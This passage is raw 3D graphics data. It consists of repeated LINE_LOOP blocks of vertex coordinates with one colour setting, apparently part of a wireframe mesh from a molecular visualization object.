VERTEX, 9.191, 34.004, 26.238,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.199, 33.698, 26.420,
VERTEX, 9.191, 34.004, 26.238,
VERTEX, 9.258, 33.694, 26.642,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.191, 34.004, 26.238,
VERTEX, 9.258, 33.694, 26.642,
VERTEX, 9.299, 34.039, 26.438,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.258, 33.694, 26.642,
VERTEX, 9.299, 34.039, 26.438,
VERTEX, 9.432, 33.605, 26.762,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.299, 34.039, 26.438,
VERTEX, 9.432, 33.605, 26.762,
VERTEX, 9.476, 33.940, 26.547,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.432, 33.605, 26.762,
VERTEX, 9.476, 33.940, 26.547,
VERTEX, 9.618, 33.481, 26.710,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.476, 33.940, 26.547,
VERTEX, 9.618, 33.481, 26.710,
VERTEX, 9.617, 33.765, 26.501,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.618, 33.481, 26.710,
VERTEX, 9.617, 33.765, 26.501,
VERTEX, 9.708, 33.396, 26.517,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.617, 33.765, 26.501,
VERTEX, 9.708, 33.396, 26.517,
VERTEX, 9.641, 33.616, 26.328,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.641, 33.616, 26.328,
VERTEX, 9.619, 33.822, 26.081,
VERTEX, 9.533, 33.581, 26.128,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.619, 33.822, 26.081,
VERTEX, 9.533, 33.581, 26.128,
VERTEX, 9.470, 33.770, 25.915,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.533, 33.581, 26.128,
VERTEX, 9.470, 33.770, 25.915,
VERTEX, 9.356, 33.680, 26.019,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.470, 33.770, 25.915,
VERTEX, 9.356, 33.680, 26.019,
VERTEX, 9.293, 33.879, 25.817,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.356, 33.680, 26.019,
VERTEX, 9.293, 33.879, 25.817,
VERTEX, 9.215, 33.855, 26.065,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.293, 33.879, 25.817,
VERTEX, 9.215, 33.855, 26.065,
VERTEX, 9.193, 34.084, 25.844,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.215, 33.855, 26.065,
VERTEX, 9.193, 34.084, 25.844,
VERTEX, 9.191, 34.004, 26.238,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.193, 34.084, 25.844,
VERTEX, 9.191, 34.004, 26.238,
VERTEX, 9.228, 34.265, 25.980,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.191, 34.004, 26.238,
VERTEX, 9.228, 34.265, 25.980,
VERTEX, 9.299, 34.039, 26.438,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.228, 34.265, 25.980,
VERTEX, 9.299, 34.039, 26.438,
VERTEX, 9.378, 34.316, 26.146,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.299, 34.039, 26.438,
VERTEX, 9.378, 34.316, 26.146,
VERTEX, 9.476, 33.940, 26.547,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.378, 34.316, 26.146,
VERTEX, 9.476, 33.940, 26.547,
VERTEX, 9.555, 34.208, 26.245,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.476, 33.940, 26.547,
VERTEX, 9.555, 34.208, 26.245,
VERTEX, 9.617, 33.765, 26.501,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.555, 34.208, 26.245,
VERTEX, 9.617, 33.765, 26.501,
VERTEX, 9.655, 34.003, 26.218,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.617, 33.765, 26.501,
VERTEX, 9.655, 34.003, 26.218,
VERTEX, 9.641, 33.616, 26.328,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.655, 34.003, 26.218,
VERTEX, 9.641, 33.616, 26.328,
VERTEX, 9.619, 33.822, 26.081,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.619, 33.822, 26.081,
VERTEX, 9.649, 33.964, 25.802,
VERTEX, 9.470, 33.770, 25.915,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.649, 33.964, 25.802,
VERTEX, 9.470, 33.770, 25.915,
VERTEX, 9.472, 33.912, 25.666,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.470, 33.770, 25.915,
VERTEX, 9.472, 33.912, 25.666,
VERTEX, 9.293, 33.879, 25.817,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.472, 33.912, 25.666,
VERTEX, 9.293, 33.879, 25.817,
VERTEX, 9.297, 34.029, 25.575,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.293, 33.879, 25.817,
VERTEX, 9.297, 34.029, 25.575,
VERTEX, 9.193, 34.084, 25.844,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.297, 34.029, 25.575,
VERTEX, 9.193, 34.084, 25.844,
VERTEX, 9.226, 34.248, 25.582,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.193, 34.084, 25.844,
VERTEX, 9.226, 34.248, 25.582,
VERTEX, 9.228, 34.265, 25.980,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.226, 34.248, 25.582,
VERTEX, 9.228, 34.265, 25.980,
VERTEX, 9.302, 34.439, 25.685,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.228, 34.265, 25.980,
VERTEX, 9.302, 34.439, 25.685,
VERTEX, 9.378, 34.316, 26.146,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.302, 34.439, 25.685,
VERTEX, 9.378, 34.316, 26.146,
VERTEX, 9.479, 34.491, 25.821,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.378, 34.316, 26.146,
VERTEX, 9.479, 34.491, 25.821,
VERTEX, 9.555, 34.208, 26.245,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.479, 34.491, 25.821,
VERTEX, 9.555, 34.208, 26.245,
VERTEX, 9.654, 34.374, 25.912,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.555, 34.208, 26.245,
VERTEX, 9.654, 34.374, 25.912,
VERTEX, 9.655, 34.003, 26.218,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.654, 34.374, 25.912,
VERTEX, 9.655, 34.003, 26.218,
VERTEX, 9.724, 34.155, 25.904,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.655, 34.003, 26.218,
VERTEX, 9.724, 34.155, 25.904,
VERTEX, 9.619, 33.822, 26.081,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.724, 34.155, 25.904,
VERTEX, 9.619, 33.822, 26.081,
VERTEX, 9.649, 33.964, 25.802,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.649, 33.964, 25.802,
VERTEX, 9.729, 34.057, 25.491,
VERTEX, 9.472, 33.912, 25.666,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.729, 34.057, 25.491,
VERTEX, 9.472, 33.912, 25.666,
VERTEX, 9.538, 34.011, 25.370,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.472, 33.912, 25.666,
VERTEX, 9.538, 34.011, 25.370,
VERTEX, 9.297, 34.029, 25.575,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.538, 34.011, 25.370,
VERTEX, 9.297, 34.029, 25.575,
VERTEX, 9.367, 34.137, 25.285,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.297, 34.029, 25.575,
VERTEX, 9.367, 34.137, 25.285,
VERTEX, 9.226, 34.248, 25.582,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.367, 34.137, 25.285,
VERTEX, 9.226, 34.248, 25.582,
VERTEX, 9.314, 34.361, 25.284,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.226, 34.248, 25.582,
VERTEX, 9.314, 34.361, 25.284,
VERTEX, 9.302, 34.439, 25.685,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.314, 34.361, 25.284,
VERTEX, 9.302, 34.439, 25.685,
VERTEX, 9.411, 34.551, 25.368,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.302, 34.439, 25.685,
VERTEX, 9.411, 34.551, 25.368,
VERTEX, 9.479, 34.491, 25.821,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.411, 34.551, 25.368,
VERTEX, 9.479, 34.491, 25.821,
VERTEX, 9.602, 34.596, 25.489,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.479, 34.491, 25.821,
VERTEX, 9.602, 34.596, 25.489,
VERTEX, 9.654, 34.374, 25.912,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.602, 34.596, 25.489,
VERTEX, 9.654, 34.374, 25.912,
VERTEX, 9.773, 34.470, 25.574,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.654, 34.374, 25.912,
VERTEX, 9.773, 34.470, 25.574,
VERTEX, 9.724, 34.155, 25.904,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.773, 34.470, 25.574,
VERTEX, 9.724, 34.155, 25.904,
VERTEX, 9.826, 34.247, 25.575,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.724, 34.155, 25.904,
VERTEX, 9.826, 34.247, 25.575,
VERTEX, 9.649, 33.964, 25.802,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.826, 34.247, 25.575,
VERTEX, 9.649, 33.964, 25.802,
VERTEX, 9.729, 34.057, 25.491,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.729, 34.057, 25.491,
VERTEX, 9.855, 34.114, 25.156,
VERTEX, 9.538, 34.011, 25.370,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.855, 34.114, 25.156,
VERTEX, 9.538, 34.011, 25.370,
VERTEX, 9.660, 34.078, 25.040,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.538, 34.011, 25.370,
VERTEX, 9.660, 34.078, 25.040,
VERTEX, 9.367, 34.137, 25.285,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.660, 34.078, 25.040,
VERTEX, 9.367, 34.137, 25.285,
VERTEX, 9.493, 34.213, 24.958,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.367, 34.137, 25.285,
VERTEX, 9.493, 34.213, 24.958,
VERTEX, 9.314, 34.361, 25.284,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.493, 34.213, 24.958,
VERTEX, 9.314, 34.361, 25.284,
VERTEX, 9.451, 34.438, 24.958,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.314, 34.361, 25.284,
VERTEX, 9.451, 34.438, 24.958,
VERTEX, 9.411, 34.551, 25.368,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.451, 34.438, 24.958,
VERTEX, 9.411, 34.551, 25.368,
VERTEX, 9.560, 34.624, 25.041,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.411, 34.551, 25.368,
VERTEX, 9.560, 34.624, 25.041,
VERTEX, 9.602, 34.596, 25.489,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.560, 34.624, 25.041,
VERTEX, 9.602, 34.596, 25.489,
VERTEX, 9.755, 34.659, 25.156,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.602, 34.596, 25.489,
VERTEX, 9.755, 34.659, 25.156,
VERTEX, 9.773, 34.470, 25.574,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.755, 34.659, 25.156,
VERTEX, 9.773, 34.470, 25.574,
VERTEX, 9.922, 34.525, 25.238,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.773, 34.470, 25.574,
VERTEX, 9.922, 34.525, 25.238,
VERTEX, 9.826, 34.247, 25.575,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.922, 34.525, 25.238,
VERTEX, 9.826, 34.247, 25.575,
VERTEX, 9.964, 34.299, 25.238,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.826, 34.247, 25.575,
VERTEX, 9.964, 34.299, 25.238,
VERTEX, 9.729, 34.057, 25.491,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.964, 34.299, 25.238,
VERTEX, 9.729, 34.057, 25.491,
VERTEX, 9.855, 34.114, 25.156,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.855, 34.114, 25.156,
VERTEX, 10.027, 34.156, 24.807,
VERTEX, 9.660, 34.078, 25.040,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.027, 34.156, 24.807,
VERTEX, 9.660, 34.078, 25.040,
VERTEX, 9.833, 34.130, 24.687,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.660, 34.078, 25.040,
VERTEX, 9.833, 34.130, 24.687,
VERTEX, 9.493, 34.213, 24.958,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.833, 34.130, 24.687,
VERTEX, 9.493, 34.213, 24.958,
VERTEX, 9.670, 34.272, 24.609,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.493, 34.213, 24.958,
VERTEX, 9.670, 34.272, 24.609,
VERTEX, 9.451, 34.438, 24.958,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.670, 34.272, 24.609,
VERTEX, 9.451, 34.438, 24.958,
VERTEX, 9.635, 34.499, 24.618,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.451, 34.438, 24.958,
VERTEX, 9.635, 34.499, 24.618,
VERTEX, 9.560, 34.624, 25.041,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.635, 34.499, 24.618,
VERTEX, 9.560, 34.624, 25.041,
VERTEX, 9.747, 34.677, 24.709,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.560, 34.624, 25.041,
VERTEX, 9.747, 34.677, 24.709,
VERTEX, 9.755, 34.659, 25.156,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.747, 34.677, 24.709,
VERTEX, 9.755, 34.659, 25.156,
VERTEX, 9.941, 34.703, 24.829,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.755, 34.659, 25.156,
VERTEX, 9.941, 34.703, 24.829,
VERTEX, 9.922, 34.525, 25.238,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.941, 34.703, 24.829,
VERTEX, 9.922, 34.525, 25.238,
VERTEX, 10.103, 34.561, 24.907,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.922, 34.525, 25.238,
VERTEX, 10.103, 34.561, 24.907,
VERTEX, 9.964, 34.299, 25.238,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.103, 34.561, 24.907,
VERTEX, 9.964, 34.299, 25.238,
VERTEX, 10.139, 34.334, 24.899,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.964, 34.299, 25.238,
VERTEX, 10.139, 34.334, 24.899,
VERTEX, 9.855, 34.114, 25.156,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.139, 34.334, 24.899,
VERTEX, 9.855, 34.114, 25.156,
VERTEX, 10.027, 34.156, 24.807,
END,
COLOR, 0.000, 0.863, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 10.027, 34.156, 24.807,
VERTEX, 10.243, 34.200, 24.455,
VERTEX, 9.833, 34.130, 24.687,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.243, 34.200, 24.455,
VERTEX, 9.833, 34.130, 24.687,
VERTEX, 10.054, 34.185, 24.325,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.833, 34.130, 24.687,
VERTEX, 10.054, 34.185, 24.325,
VERTEX, 9.670, 34.272, 24.609,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.054, 34.185, 24.325,
VERTEX, 9.670, 34.272, 24.609,
VERTEX, 9.897, 34.335, 24.250,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.670, 34.272, 24.609,
VERTEX, 9.897, 34.335, 24.250,
VERTEX, 9.635, 34.499, 24.618,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.897, 34.335, 24.250,
VERTEX, 9.635, 34.499, 24.618,
VERTEX, 9.863, 34.561, 24.273,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.635, 34.499, 24.618,
VERTEX, 9.863, 34.561, 24.273,
VERTEX, 9.747, 34.677, 24.709,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.863, 34.561, 24.273,
VERTEX, 9.747, 34.677, 24.709,
VERTEX, 9.973, 34.731, 24.382,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.747, 34.677, 24.709,
VERTEX, 9.973, 34.731, 24.382,
VERTEX, 9.941, 34.703, 24.829,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.973, 34.731, 24.382,
VERTEX, 9.941, 34.703, 24.829,
VERTEX, 10.162, 34.745, 24.512,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.941, 34.703, 24.829,
VERTEX, 10.162, 34.745, 24.512,
VERTEX, 10.103, 34.561, 24.907,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.162, 34.745, 24.512,
VERTEX, 10.103, 34.561, 24.907,
VERTEX, 10.319, 34.595, 24.587,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.103, 34.561, 24.907,
VERTEX, 10.319, 34.595, 24.587,
VERTEX, 10.139, 34.334, 24.899,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.319, 34.595, 24.587,
VERTEX, 10.139, 34.334, 24.899,
VERTEX, 10.352, 34.370, 24.564,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.139, 34.334, 24.899,
VERTEX, 10.352, 34.370, 24.564,
VERTEX, 10.027, 34.156, 24.807,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.352, 34.370, 24.564,
VERTEX, 10.027, 34.156, 24.807,
VERTEX, 10.243, 34.200, 24.455,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.243, 34.200, 24.455,
VERTEX, 10.503, 34.267, 24.107,
VERTEX, 10.054, 34.185, 24.325,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.503, 34.267, 24.107,
VERTEX, 10.054, 34.185, 24.325,
VERTEX, 10.323, 34.266, 23.964,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.054, 34.185, 24.325,
VERTEX, 10.323, 34.266, 23.964,
VERTEX, 9.897, 34.335, 24.250,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.323, 34.266, 23.964,
VERTEX, 9.897, 34.335, 24.250,
VERTEX, 10.171, 34.422, 23.893,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.897, 34.335, 24.250,
VERTEX, 10.171, 34.422, 23.893,
VERTEX, 9.863, 34.561, 24.273,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.171, 34.422, 23.893,
VERTEX, 9.863, 34.561, 24.273,
VERTEX, 10.136, 34.645, 23.936,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.863, 34.561, 24.273,
VERTEX, 10.136, 34.645, 23.936,
VERTEX, 9.973, 34.731, 24.382,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.136, 34.645, 23.936,
VERTEX, 9.973, 34.731, 24.382,
VERTEX, 10.237, 34.803, 24.068,
END,
BEGIN, LINE_LOOP,
VERTEX, 9.973, 34.731, 24.382,
VERTEX, 10.237, 34.803, 24.068,
VERTEX, 10.162, 34.745, 24.512,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.237, 34.803, 24.068,
VERTEX, 10.162, 34.745, 24.512,
VERTEX, 10.416, 34.804, 24.212,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.162, 34.745, 24.512,
VERTEX, 10.416, 34.804, 24.212,
VERTEX, 10.319, 34.595, 24.587,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.416, 34.804, 24.212,
VERTEX, 10.319, 34.595, 24.587,
VERTEX, 10.568, 34.647, 24.283,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.319, 34.595, 24.587,
VERTEX, 10.568, 34.647, 24.283,
VERTEX, 10.352, 34.370, 24.564,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.568, 34.647, 24.283,
VERTEX, 10.352, 34.370, 24.564,
VERTEX, 10.604, 34.425, 24.240,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.352, 34.370, 24.564,
VERTEX, 10.604, 34.425, 24.240,
VERTEX, 10.243, 34.200, 24.455,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.604, 34.425, 24.240,
VERTEX, 10.243, 34.200, 24.455,
VERTEX, 10.503, 34.267, 24.107,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.503, 34.267, 24.107,
VERTEX, 10.806, 34.376, 23.775,
VERTEX, 10.323, 34.266, 23.964,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.806, 34.376, 23.775,
VERTEX, 10.323, 34.266, 23.964,
VERTEX, 10.641, 34.391, 23.617,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.323, 34.266, 23.964,
VERTEX, 10.641, 34.391, 23.617,
VERTEX, 10.171, 34.422, 23.893,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.641, 34.391, 23.617,
VERTEX, 10.171, 34.422, 23.893,
VERTEX, 10.493, 34.555, 23.551,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.171, 34.422, 23.893,
VERTEX, 10.493, 34.555, 23.551,
VERTEX, 10.136, 34.645, 23.936,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.493, 34.555, 23.551,
VERTEX, 10.136, 34.645, 23.936,
VERTEX, 10.450, 34.770, 23.617,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.136, 34.645, 23.936,
VERTEX, 10.450, 34.770, 23.617,
VERTEX, 10.237, 34.803, 24.068,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.450, 34.770, 23.617,
VERTEX, 10.237, 34.803, 24.068,
VERTEX, 10.537, 34.912, 23.775,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.237, 34.803, 24.068,
VERTEX, 10.537, 34.912, 23.775,
VERTEX, 10.416, 34.804, 24.212,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.537, 34.912, 23.775,
VERTEX, 10.416, 34.804, 24.212,
VERTEX, 10.703, 34.897, 23.933,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.416, 34.804, 24.212,
VERTEX, 10.703, 34.897, 23.933,
VERTEX, 10.568, 34.647, 24.283,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.703, 34.897, 23.933,
VERTEX, 10.568, 34.647, 24.283,
VERTEX, 10.850, 34.734, 23.999,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.568, 34.647, 24.283,
VERTEX, 10.850, 34.734, 23.999,
VERTEX, 10.604, 34.425, 24.240,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.850, 34.734, 23.999,
VERTEX, 10.604, 34.425, 24.240,
VERTEX, 10.893, 34.518, 23.933,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.604, 34.425, 24.240,
VERTEX, 10.893, 34.518, 23.933,
VERTEX, 10.503, 34.267, 24.107,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.893, 34.518, 23.933,
VERTEX, 10.503, 34.267, 24.107,
VERTEX, 10.806, 34.376, 23.775,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.806, 34.376, 23.775,
VERTEX, 11.153, 34.548, 23.467,
VERTEX, 10.641, 34.391, 23.617,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.153, 34.548, 23.467,
VERTEX, 10.641, 34.391, 23.617,
VERTEX, 11.003, 34.583, 23.297,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.641, 34.391, 23.617,
VERTEX, 11.003, 34.583, 23.297,
VERTEX, 10.493, 34.555, 23.551,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.003, 34.583, 23.297,
VERTEX, 10.493, 34.555, 23.551,
VERTEX, 10.859, 34.752, 23.239,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.493, 34.555, 23.551,
VERTEX, 10.859, 34.752, 23.239,
VERTEX, 10.450, 34.770, 23.617,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.859, 34.752, 23.239,
VERTEX, 10.450, 34.770, 23.617,
VERTEX, 10.805, 34.957, 23.328,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.450, 34.770, 23.617,
VERTEX, 10.805, 34.957, 23.328,
VERTEX, 10.537, 34.912, 23.775,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.805, 34.957, 23.328,
VERTEX, 10.537, 34.912, 23.775,
VERTEX, 10.873, 35.077, 23.512,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.537, 34.912, 23.775,
VERTEX, 10.873, 35.077, 23.512,
VERTEX, 10.703, 34.897, 23.933,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.873, 35.077, 23.512,
VERTEX, 10.703, 34.897, 23.933,
VERTEX, 11.023, 35.042, 23.682,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.703, 34.897, 23.933,
VERTEX, 11.023, 35.042, 23.682,
VERTEX, 10.850, 34.734, 23.999,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.023, 35.042, 23.682,
VERTEX, 10.850, 34.734, 23.999,
VERTEX, 11.168, 34.873, 23.739,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.850, 34.734, 23.999,
VERTEX, 11.168, 34.873, 23.739,
VERTEX, 10.893, 34.518, 23.933,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.168, 34.873, 23.739,
VERTEX, 10.893, 34.518, 23.933,
VERTEX, 11.222, 34.668, 23.650,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.893, 34.518, 23.933,
VERTEX, 11.222, 34.668, 23.650,
VERTEX, 10.806, 34.376, 23.775,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.222, 34.668, 23.650,
VERTEX, 10.806, 34.376, 23.775,
VERTEX, 11.153, 34.548, 23.467,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.153, 34.548, 23.467,
VERTEX, 11.539, 34.800, 23.194,
VERTEX, 11.003, 34.583, 23.297,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.539, 34.800, 23.194,
VERTEX, 11.003, 34.583, 23.297,
VERTEX, 11.401, 34.855, 23.019,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.003, 34.583, 23.297,
VERTEX, 11.401, 34.855, 23.019,
VERTEX, 10.859, 34.752, 23.239,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.401, 34.855, 23.019,
VERTEX, 10.859, 34.752, 23.239,
VERTEX, 11.259, 35.029, 22.973,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.859, 34.752, 23.239,
VERTEX, 11.259, 35.029, 22.973,
VERTEX, 10.805, 34.957, 23.328,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.259, 35.029, 22.973,
VERTEX, 10.805, 34.957, 23.328,
VERTEX, 11.196, 35.221, 23.082,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.805, 34.957, 23.328,
VERTEX, 11.196, 35.221, 23.082,
VERTEX, 10.873, 35.077, 23.512,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.196, 35.221, 23.082,
VERTEX, 10.873, 35.077, 23.512,
VERTEX, 11.249, 35.318, 23.284,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.873, 35.077, 23.512,
VERTEX, 11.249, 35.318, 23.284,
VERTEX, 11.023, 35.042, 23.682,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.249, 35.318, 23.284,
VERTEX, 11.023, 35.042, 23.682,
VERTEX, 11.387, 35.263, 23.459,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.023, 35.042, 23.682,
VERTEX, 11.387, 35.263, 23.459,
VERTEX, 11.168, 34.873, 23.739,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.387, 35.263, 23.459,
VERTEX, 11.168, 34.873, 23.739,
VERTEX, 11.529, 35.089, 23.505,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.168, 34.873, 23.739,
VERTEX, 11.529, 35.089, 23.505,
VERTEX, 11.222, 34.668, 23.650,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.529, 35.089, 23.505,
VERTEX, 11.222, 34.668, 23.650,
VERTEX, 11.592, 34.897, 23.396,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.222, 34.668, 23.650,
VERTEX, 11.592, 34.897, 23.396,
VERTEX, 11.153, 34.548, 23.467,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.592, 34.897, 23.396,
VERTEX, 11.153, 34.548, 23.467,
VERTEX, 11.539, 34.800, 23.194,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.539, 34.800, 23.194,
VERTEX, 11.914, 35.093, 22.971,
VERTEX, 11.401, 34.855, 23.019,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.914, 35.093, 22.971,
VERTEX, 11.401, 34.855, 23.019,
VERTEX, 11.782, 35.163, 22.797,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.401, 34.855, 23.019,
VERTEX, 11.782, 35.163, 22.797,
VERTEX, 11.259, 35.029, 22.973,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.782, 35.163, 22.797,
VERTEX, 11.259, 35.029, 22.973,
VERTEX, 11.640, 35.340, 22.762,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.259, 35.029, 22.973,
VERTEX, 11.640, 35.340, 22.762,
VERTEX, 11.196, 35.221, 23.082,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.640, 35.340, 22.762,
VERTEX, 11.196, 35.221, 23.082,
VERTEX, 11.573, 35.521, 22.886,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.196, 35.221, 23.082,
VERTEX, 11.573, 35.521, 22.886,
VERTEX, 11.249, 35.318, 23.284,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.573, 35.521, 22.886,
VERTEX, 11.249, 35.318, 23.284,
